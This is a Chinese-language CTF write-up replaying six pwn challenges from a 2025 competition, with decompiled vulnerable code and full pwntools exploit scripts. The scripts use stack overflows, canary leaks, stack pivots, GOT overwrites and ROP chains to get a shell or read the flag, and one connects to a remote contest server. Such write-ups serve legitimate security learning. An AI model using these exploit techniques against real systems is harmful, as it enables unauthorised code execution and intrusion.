Bootstrap

[春秋杯冬季赛2025] pwn复现

看了不少WP,终于把这些重走了一遍。学到不少。

第1天

bypass

先是泄露了libc地址,然后在输入key和val的时候从临时变量s向目标位置复制时并没有正确的判断字符串长度,当val长度填满时会把前边填入的key的值连续复制,造成溢出。由于复制的时候以0表示结束,所以只能写到ret,在这时写one即可。

int m0()
{
  ssize_t v0; // rax
  char s[512]; // [rsp+0h] [rbp-610h] BYREF
  char s2[512]; // [rsp+200h] [rbp-410h] BYREF
  char v4[526]; // [rsp+400h] [rbp-210h] BYREF
  __int16 i; // [rsp+60Eh] [rbp-2h]

  memset(v4, 0, 0x200uLL);
  memset(s2, 0, sizeof(s2));
  memset(s, 0, sizeof(s));
  v0 = read(0, s, 0x200uLL);
  if ( v0 >= 0 )
  {
    LODWORD(v0) = strncmp(s, "KEY: ", 5uLL);
    if ( !(_DWORD)v0 )
    {
      for ( i = 5; s[i]; ++i )
        s2[i - 5] = s[i];
      s2[i - 5] = 0;
      memset(s, 0, sizeof(s));
      v0 = read(0, s, 0x200uLL);
      if ( v0 >= 0 )
      {
        LODWORD(v0) = strncmp(s, "VAL: ", 5uLL);
        if ( !(_DWORD)v0 )
        {
          for ( i = 5; s[i]; ++i )
            v4[i - 5] = s[i];                   // 先填充s2再用,s1填充v4溢出
          v4[i - 5] = 0;
          LODWORD(v0) = strcmp(dest, s2);
          if ( !(_DWORD)v0 )
          {
            LODWORD(v0) = strcmp(byte_602140, v4);
            if ( !(_DWORD)v0 )
            {
              puts("good job!");
              exit(0);
            }
          }
        }
      }
    }
  }
  return v0;
}
from pwn import *
context(arch='amd64', log_level='debug')

libc = ELF('./libc.so.6')

#p = process('./pwn')
p = remote('101.200.198.105', 30867)

p.send(p32(2))
p.recvuntil(b'Invalid\n')
libc.address = u64(p.recvline()[:-1].ljust(8,b'\0')) - libc.sym['puts']
print(f"{libc.address = :x}")

#
#gdb.attach(p, "b*0x400b6b\nc")
p.send(p32(0))

one = [0x4f2a5,0x4f302,0x10a2fc]
p.send((b'KEY: '+b'A'*(14+4)+b'X'+p8(0x18+4)+b'B'*9+p64(libc.address+one[1])).ljust(0x200,b'\0'))

p.send(b'VAL: '+b'A'*(0x200-5))

p.interactive()

'''
0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f302 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a2fc execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

gender_simulation

C++的程序,辣子鸡丁式程序,找到一些代码。在选girl再选tomboy时,输入的内容作为指针处理,在这里输入后门地址,后门里有溢出。

    if ( v10 == 50 )
    {
      std::string::basic_string(v9);
      v17 = a1;
      v6 = std::operator<<<std::char_traits<char>>(
             &std::cout,
             "If you think you are a boy, please leave your gender certificate");
      std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
      std::operator>><char>(&std::cin, v9);
      v7 = (const char *)std::string::c_str(v9);// 输入的值被当作函数指针
      strncpy((char *)v17 + 8, v7, 0x10uLL);
      (**(void (__fastcall ***)(Baby *))v17)(v17);
      std::string::~string(v9);
      return std::string::~string(v11);
    }
from pwn import *
context(arch='amd64',log_level = 'debug')

libc = ELF('./libc.so.6') #2.39-0u8.3
elf = ELF('./pwn')

p = process('./pwn')

p.recvuntil(b"A gift: ")
libc.address = int(p.recvline(), 16) - libc.sym['setvbuf']
print(f"{libc.address = :x}")

p.sendlineafter(b"2. Girl\n", b'2')
p.sendlineafter(b"2. Tomboy\n", b'2')

#当选择Tomboy时,会在this+1处读入16字节,然后执行this+1处的函数指针。
p.sendlineafter(b"If you think you are a boy, please leave your gender certificate\n", p64(0x4025e6))

'''
pwndbg> x/20gx 0x4192a0
0x4192a0:       0x0000000000000000      0x0000000000000021
0x4192b0:       0x0000000000405d60      0x0000000000403351  <-- Backdoor:0x4025e6 _Z6genderv
0x4192c0:       0x0000000000000000      0x000000000000ed41

0x405d60->0x4033f6:Girl::gender(Girl *__hidden this)  (this+1)("The certificate is ")
'''

pop_rdi = libc.address + 0x000000000010f75b # pop rdi ; ret
pay = b'\0'*0x18 + flat(pop_rdi+1, pop_rdi, next(libc.search(b'/bin/sh\0')), libc.sym['system'])
#gender
p.sendafter(b"If you think you are a shopping bag, please leave your gender certificate\n", pay)
p.interactive()

 

第2天

easy_http

又是一个复杂代码系统。不清楚这PWN走向何方。难度不大代码巨难看。改成考看代码了。模拟了一个web服务器,有4个路由add,free,edit,show代码很长,其实都没用。在把输入数据解析后进入处理程序,这里空间很小,向栈内复制时会造成溢出。跟走哪个路由没关系。

有个坑,在子进程处理时栈溢出后运行里会有指针用到栈外的数据,需要用个ppp跳过。

from pwn import *
context(arch='amd64', log_level='debug')

p = process('./pwn')
gdb.attach(p, "set follow-fork-mode child\nb*0x40218d\nc")

aa = "POST /show HTTP/1.1\r\nHost: a\r\nContent-Length: {}\r\nContent: "

#show canary
pay = b'A'*0x108+b'X'
p.send(aa.format(len(pay)).encode()+pay +b'\r\n')
p.recvuntil(b'AAX')
canary = b'\0'+p.recv(7)
print('canary = ',canary.hex())

#rop
bss = 0x4e9000
ppp5    = 0x000000000040545d # pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
pop_rdi = 0x000000000040297f # pop rdi ; ret
pop_rsi = 0x000000000040a9ee # pop rsi ; ret
pop_rdx = 0x00000000004a4c4b # pop rdx ; pop rbx ; ret
pop_rax = 0x0000000000459227 # pop rax ; ret
syscall = 0x422ff6 #syscall;ret
pay = b'A'*0x108+canary+flat([0, 
    ppp5, (b'a'*0x15+b'/add\0').ljust(0x28,b'a'),  #qword_4E8308指向一个route 写/add\0
    pop_rdi,0,pop_rsi,bss,pop_rdx,4,0,pop_rax,0,syscall, #read 'flag'
    pop_rdi,bss, pop_rsi,0,pop_rax,2,syscall, #open(flag)
    pop_rdi,3,pop_rsi,bss,pop_rdx,0x50,0,pop_rax,0, syscall, #read(3,buf,0x50)
    pop_rdi,1,pop_rax,1,syscall
]) 
p.send(aa.format(len(pay)).encode()+pay +b'\r\n')

sleep(1)
p.send(b'flag')

p.interactive()

easyshellcode

先输入0x30的name,然后输入3字节代码执行。3字节可以用push rsi;pop rsp;ret跳到name处的ROP执行。ROP执行个read向代码处读入代码。再跳到代码执行shellcode。本地好好的,但是远程一直不成功。后来的WP里也没有。不清楚怎么回事,按理说shellcode题不应该环境不同。

from pwn import *
context(arch='amd64', log_level='debug')

p = process('./pwn')
#gdb.attach(p, "b*0x4013c4\nc")

p.recvuntil(b"gift: ")
buf = int(p.recvuntil(b'.', drop=True), 16)

pop_rdi_rsi = 0x4013c9
syscall = 0x401332
mov_edx_ecx = 0x4012b1

#rax=0  read(0,buf,xx);buf;
p.sendafter(b"> ", flat(pop_rdi_rsi, 0,buf,mov_edx_ecx,syscall,buf))

p.sendafter(b"> ", b'V\\\xc3') #push rsi;pop rsp;ret

p.send(asm(shellcraft.sh()))

p.interactive()

第3天

riya

输入个n就行了,代码不用看了。

topys

代码简单了,作起来难了,到泄露的地方就没弄完。看了WP,还有再跳一次。

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s[128]; // [rsp+0h] [rbp-80h] BYREF

  sub_4011D6();
  puts("There are no toys here!");
  printf("Data: ");
  fgets(s, 4919, stdin);
  if ( strlen(s) > 0x80 )
  {
    puts("Too many!");
    exit(-1);
  }
  puts("OK!");
  return 0LL;
}

fgets有个溢出,只是没有可用的gadget。用代码里fgets后边会有leave ret,所以要移栈。

这里用到大概3块,第1块是got表,因为栈有0x80长,对应的后部就是0x80这块,当执行got的写入和泄露时返回地址写到+80的里,但是在这里执行代码会导致覆盖got表系统崩掉。所以这里应该写leave ret跳远远的。跳到在+800的位置。这里一共跳7次。1先移栈到+800,2写3个leave ret到+80处,跳回到+810,写got表(不溢出,利用已写好的+80处的leave ret跳到+800),由于高版本的libc在写got表把strlen改为puts后并不会对这个不正确的位置重填充,所以不能一次完成修改和泄露。在跳到800后再执行移栈跳到got表的其它项执行strlen泄露,最后跳回后写ROP。

from pwn import *
context(arch='amd64', log_level='debug')

libc = ELF('./libc.so.6') #Ubuntu GLIBC 2.39-0ubuntu8.3
elf = ELF('./pwn')

call_fgets = 0x401274 #fgets(s,4919,stdin);strlen(s);puts('');leave;ret
call_strlen = 0x40128c #                   strlen(s);puts('');leave;ret
leave_ret = 0x4012cd   #                                      leave;ret
got_base = 0x404000
got_strlen = 0x404008
plt_puts = 0x401090

#fgets有溢出,多次移栈泄露libc 防止移栈后写到不能写区域

p = process('./pwn')
gdb.attach(p, "b*0x4012cd\nc")
#1                               
p.sendlineafter(b"Data: ", flat(b'\0'*0x80, got_base+0x800, call_fgets))

#2                                         800                         810                          820                           830
p.sendlineafter(b"OK!\n", flat(b'\0'*0x80, got_base+0x100, call_fgets, got_strlen+0x80, call_fgets, got_strlen+0x98, call_strlen, got_strlen+0x700, call_fgets))
'''
0x404800:       0x0000000000404100      0x0000000000401274   #1  read(0x404080)
0x404810:       0x0000000000404088      0x0000000000401274   #3  read(0x404008) 0x404008 <[email protected]>: 0x0000000000401090
0x404820:       0x00000000004040a0      0x000000000040128c   #5  puts:strlen(0x404020) 
0x404830:       0x0000000000404708      0x0000000000401274   #7  read(0x404680)
'''
#3
p.sendlineafter(b"OK!\n", flat(0, got_base+0x820,leave_ret,0,got_base+0x830,leave_ret,).ljust(0x80,b'\0') + flat(got_base+0x810, leave_ret) )
'''
0x404080:       0x0000000000000000      0x0000000000404820  #4  
0x404090:       0x00000000004012cd      0x0000000000000000  
0x4040a0:       0x0000000000404830      0x00000000004012cd  #6
...
0x404100:       0x0000000000404810      0x00000000004012cd  #2
'''
#4
p.sendlineafter(b"OK!\n", flat(plt_puts))

#5
p.recvuntil(b"OK!\n")
libc.address = u64(p.recv(6)+b'\0\0') - 0x88540
print(f"{libc.address = :x}")
pop_rdi = libc.address + 0x000000000010f75b # pop rdi ; ret #next(libc.search(asm('pop rdi;ret')))

#6
p.sendlineafter(b"OK!\n", flat(b'\0'*0x80,0x404900, pop_rdi, next(libc.search(b'/bin/sh\0')), libc.sym['system']))
'''
0x404710:       0x0000ffffef90f75b      0x00007ffff7dcb42f
0x404720:       0x00007ffff7c58740      
'''
p.interactive()

rogue_like

这个一直没复现成,可能跟本地和远程有关。在 close(2)后,程序会退出。而远程可能并不受影响。

程序一共有3个菜单,每个菜单里又各有3项。

菜单1的3项分别是:1,写mmap的地址任意偏移处8字节0;2,写1个字符;3,泄露maps

菜单2的3项分别是:1,任意地址写随机数;2,任意地址加不大于5的数,3,同2但有canary

菜单3的3项分别是:1,溢出但close(0);2,泄露栈但没有溢出,3,off_by_null可以将rbp尾字节置0

菜单3会先close(1),close(2)

从后边往前看,有溢出的没有canary不行,泄露canary的又没有溢出。最后出口只有3个,所以选择有溢出的,在1和3里选3,保留标准输入,反正如果有了shell可能把1重定向到0上。

第3关肯定过不了canary所以第1层就只能选1,覆盖canary为0

第2关在官方WP是向got.alarm加5使它把向syscall,然后pop rsp支执行。怎么弄也没弄成。然后我就没用,随便写个地址。不影响运行就行。也没弄成。估计就差在close(2)的里本地和远程的区别了。

题目给了libc-2.27.so,这种旧版的libc 在mmap时会加载到一个固定位置,而且每次都相同。所以先运行下程序选3,泄露maps计算出str与TLS里canary的偏移。

由于没有改alarm,在第3步的时候先作个read到bss然后移栈(因为修改尾字节的移栈空间太小),再调用attack_power的后部直接利用写在栈里值加到got.atoi里将其变成system(改atoi是因为这里与system比较近,其它的就需要大点的数)然后再调用atoi。如果没有关close(2)的话可以拿到shell

from pwn import *
context(arch='amd64', log_level='debug')

libc = ELF('./libc-2.27.so') 
elf = ELF('./pwn')

p = process('./pwn2')

'''
gef➤  x/2gx &str
0x6020f0 <str>: 0x00007ffff7ff6000      0x0000000000000001
gef➤  canary
[+] The canary of process 3629749 is at 0x7ffff7ff85a8, value is 0x7378a12ff7534b00
gef➤  x/2gx 0x7ffff7ff85a8
0x7ffff7ff85a8: 0x7378a12ff7534b00      0x17fd355f4c0b9189
gef➤  p 0x7ffff7ff85a8-0x00007ffff7ff6000
$1 = 0x25a8
'''
#gdb.attach(p, "b*0x400c8a\nc")
#1.1 set_zero  canary:str-x25a8=0
p.sendlineafter(b"> ", b'1')
p.sendafter(b'..!?\n', str(0x25a8).encode()) #0x25a8 #先手工运行选3计算str与canary的偏移

#gdb.attach(p, "b*0x401000\nc")
#2.2 attack_power got.alarm   alarm+5=syscall
p.sendlineafter(b"> ", b'2')
p.sendlineafter(b"> ", b'1')
p.sendlineafter(b"> ", str(0x602100).encode())

#3.3 challenge3 read 0x100,read 0x50,set rbp=...0
p.sendlineafter(b"> ", b'3')
#close(1)
pop_rdi = 0x4013f4
pop_rsi = 0x4013f6
pop_rdx = 0x4013f8
pop_rsp = 0x4013fa
pop_rbp = 0x4013fd
bin_sh = 0x4019d7
ret = 0x4013f5
bss = 0x602b00
syscall = elf.got['alarm'] #0x602058
canary = 0

#gdb.attach(p, "b*0x401376\nc")

#pay = flat(pop_rbp,0x602800,pop_rdi,bin_sh,pop_rsi,0,pop_rdx,0,pop_rsp,syscall,canary) #官WP
pay3 = flat(pop_rbp, bss+0x210, 0x400fdc).ljust(0x200, b'\0') 
pay3+= flat(p32(libc.sym['system']-libc.sym['atoi'])*2,0,0,ret,pop_rdi,bss+0x248,elf.plt['atoi'],0,0,b'/bin/sh\0')


pay = flat(pop_rdx,len(pay3),pop_rsi,bss,elf.plt['read'],pop_rsp,bss,0)
pay = p64(ret)*((0x100-len(pay))//8) + pay 
pay2 = pay[:0x50]
p.send(pay)  #buf[v1] = 0;  rbp=...0
p.send(pay2)

#bss
p.send(pay3)
p.send(str(elf.got['atoi']).zfill(0x15).encode())


#sleep(0.5)
p.sendline(b"exec 1>& 0")
p.sendline(b'cat flag')
p.interactive()

;